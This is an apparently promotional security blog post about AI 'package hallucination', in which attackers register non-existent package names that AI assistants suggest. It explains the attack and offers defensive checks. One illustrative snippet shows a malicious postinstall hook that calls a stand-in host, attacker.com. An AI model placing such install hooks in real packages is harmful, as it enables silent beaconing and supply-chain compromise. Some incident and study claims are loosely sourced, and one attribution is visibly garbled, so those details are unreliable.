I Asked Claude for a Package. It Didn't Exist. An Attacker Had Already Registered It.

I Asked Claude for a Package. It Didn't Exist. An Attacker Had Already Registered It.

You ask Claude to help you validate JSON schemas. It suggests importing json-schema-validator-express. The package name sounds perfect. You run npm install. Congratulations, you just installed malware.

This attack vector didn’t exist two years ago. AI created it.

How Package Hallucination Works

Package Hallucination : When an AI model confidently recommends a software package that doesn’t exist, inventing a plausible-sounding name based on patterns in its training data rather than actual package registry contents.

AI models don’t have real-time access to npm, PyPI, or other package registries. They generate package recommendations based on patterns: common naming conventions, what sounds right, what similar packages are called.

The problem: what sounds right often isn’t real.

1
2
3
4
5
6
7
8
// AI-generated suggestion
const validator = require('express-json-schema-validator');
// Sounds legitimate. Follows naming conventions.
// Doesn't exist on npm... or didn't, until an attacker registered it.

// What actually exists
const { Validator } = require('jsonschema');
// Less intuitive name, but real and maintained

The Attack Chain

The attack is elegant in its simplicity:

Step 1: Reconnaissance Attackers query AI models with common development tasks and collect suggested package names. They identify names that don’t exist but sound legitimate.

Step 2: Registration The attacker registers the hallucinated package name on npm, PyPI, or other registries. They add code that appears functional but includes malicious payloads.

Step 3: Wait When developers ask AI for help and receive the hallucinated recommendation, they install the attacker’s package. The malicious code executes during installation or runtime.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
// Malicious package masquerading as helpful
// express-json-schema-validator/index.js

const validator = require('jsonschema').Validator;

// Looks normal, actually works for validation
module.exports = {
  validate: (schema, data) => {
    // Legitimate functionality
    const v = new Validator();
    return v.validate(data, schema);
  }
};

// But the postinstall script does this:
// "postinstall": "node -e \"require('child_process').exec('curl attacker.com/beacon?pkg='+process.env.npm_package_name)\""

The package works. Tests pass. The attack succeeds.

Real-World Examples

The python-jwt Incident

Researchers found that AI models consistently recommended python-jwt for JWT handling in Python. The actual package is PyJWT. An attacker registered python-jwt with typosquatting code.

The express-validator Variants

Multiple variants of express-validator (the real package) have been recommended by AI:

  • express-input-validator (hallucinated)
  • express-body-validator (hallucinated)
  • express-form-validator (hallucinated)

Attackers registered several before the pattern was identified.

The Lasso Security Study

by documented over 200 malicious packages that exploited AI hallucination patterns. Their research found that popular AI coding assistants hallucinate package names at rates between 5% and 20% depending on the language and domain.

Why AI Hallucinations Happen

AI models generate package names through pattern matching, not registry lookup:

Naming Convention Patterns Models learn that Express middleware often follows express-{function} patterns. When asked about JSON validation, it generates express-json-validator because that fits the pattern.

Training Data Gaps Training data includes documentation, tutorials, and code from specific points in time. Packages created after training aren’t known. Packages that existed but were deprecated might still be recommended.

Confidence Without Verification Models present hallucinated packages with the same confidence as real ones. There’s no “I’m not sure this exists” qualifier.

1
2
3
4
5
6
7
8
# AI recommendation with high confidence
# "For CSV parsing in Python, I recommend using pandas-csv-parser"

import pandas_csv_parser  # Does not exist!

# What you should use
import pandas as pd
df = pd.read_csv('file.csv')

Detection and Prevention

Protect Against Hallucinated Dependencies

Systematic approach to verifying AI package recommendations

Verify Before Installing

Before running npm install or pip install, verify the package exists:

  • Search the package registry directly
  • Check the package’s npm/PyPI page
  • Look for download statistics, maintainer info, repository links
  • Zero downloads or very recent creation dates are red flags

Check Package Age

Legitimate packages have history. Run npm view {package} time to see when it was created. Packages less than a few months old that AI recommends confidently deserve extra scrutiny.

Inspect Before Install

Use npm pack {package} to download without installing. Examine the contents, especially postinstall scripts, before adding to your project.

Use Lock Files

Commit package-lock.json or yarn.lock. These lock specific versions and make it harder for attackers to swap malicious code into existing packages.

Implement Dependency Scanning

Tools like Socket.dev, Snyk, and npm audit can flag suspicious packages. Run these before installing new dependencies, not just in CI/CD.

Verification Commands

Quick commands to validate packages before installation:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# Check if package exists and get metadata
npm view express-json-schema-validator

# See when package was created and modified
npm view express-json-schema-validator time

# Check download statistics
npm view express-json-schema-validator downloads

# For Python packages
pip index versions pandas-csv-parser

# Download and inspect without installing
npm pack suspicious-package-name
tar -xzf suspicious-package-name-*.tgz
cat package/package.json

If npm view returns “404 Not Found,” the AI hallucinated the package. If it exists but was created very recently, investigate further.

Framework for AI Package Recommendations

When AI suggests a package, run through this decision tree:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
AI suggests package "foo-bar-validator"

├── Does it exist? (npm view foo-bar-validator)
   ├── No  HALLUCINATION. Find real alternative.
   └── Yes  Continue checking

├── When was it created? (npm view foo-bar-validator time.created)
   ├── Last 6 months  SUSPICIOUS. Extra verification needed.
   └── Older  Continue checking

├── Download count?
   ├── < 100 weekly  SUSPICIOUS. Probably not what AI "learned" about.
   └── Higher  Continue checking

├── Repository link valid?
   ├── No repo or broken link  SUSPICIOUS
   └── Valid GitHub/GitLab  Continue checking

└── Maintainer credible?
    ├── No history, no other packages  VERIFY CODE MANUALLY
    └── Established maintainer  Probably safe

The Deeper Problem

Package hallucination reveals a fundamental issue with AI-assisted development: AI models present fiction with the same confidence as fact.

AI Confidence Calibration : The relationship between an AI model’s expressed certainty and the actual accuracy of its outputs. Poorly calibrated models express high confidence in incorrect or fabricated information.

The model doesn’t know what it doesn’t know. It has no concept of “this package might not exist.” Every recommendation comes with equal confidence because confidence is generated, not measured.

This isn’t a bug that will be fixed. It’s a fundamental characteristic of how large language models work. The solution isn’t better AI. The solution is verification.

FAQ

Can npm/PyPI prevent this attack?

Package registries can flag suspicious patterns: packages registered immediately after AI model releases, packages with names matching common hallucination patterns, packages with malicious install scripts. However, they can’t prevent legitimate-looking packages from being registered. The verification burden falls on developers.

Which AI models hallucinate packages most?

All major AI coding assistants hallucinate packages. Research shows rates vary by language and task complexity. Python packages are hallucinated at slightly higher rates than JavaScript. Specialized domains (validation, authentication, parsing) see higher hallucination rates because naming conventions are more predictable.

Is this a form of prompt injection?

No, it’s different. Prompt injection manipulates AI behavior through crafted inputs. Package hallucination is an emergent behavior of how models generate text. The AI isn’t being tricked. It’s confidently generating plausible-sounding but incorrect information.

How do I report a suspicious hallucinated package?

Report to the package registry’s security team:

Should I stop using AI for package recommendations?

No, but verify everything. AI recommendations are suggestions, not facts. Treat every package recommendation as “this sounds like it could exist” rather than “this definitely exists and is safe.”

Conclusion

Key Takeaways

  • AI models hallucinate 5-20% of package recommendations, inventing plausible names that don’t exist
  • Attackers register hallucinated package names and wait for developers to install them
  • Over 200 malicious packages have exploited this attack vector
  • The attack works because malicious packages often include real functionality alongside malicious code
  • Verification before installation is no longer optional in AI-assisted development
  • Check package existence with npm view or pip index versions before installing
  • Package age and download count help identify recently-registered attack packages
  • Lock files (package-lock.json) provide some protection against dependency manipulation
  • AI confidence doesn’t correlate with accuracy; treat all recommendations as unverified suggestions

Package hallucination is the supply chain attack AI created. The tools that accelerate our development also accelerate our exposure to this new attack vector.

The fix is simple but requires discipline: verify every package before installation. The three seconds of checking save you from becoming the next supply chain attack statistic.

AI Coding Security Insights.
Ship Vibe-Coded Apps Safely.

Effortlessly test and evaluate web application security using Vibe Eval agents.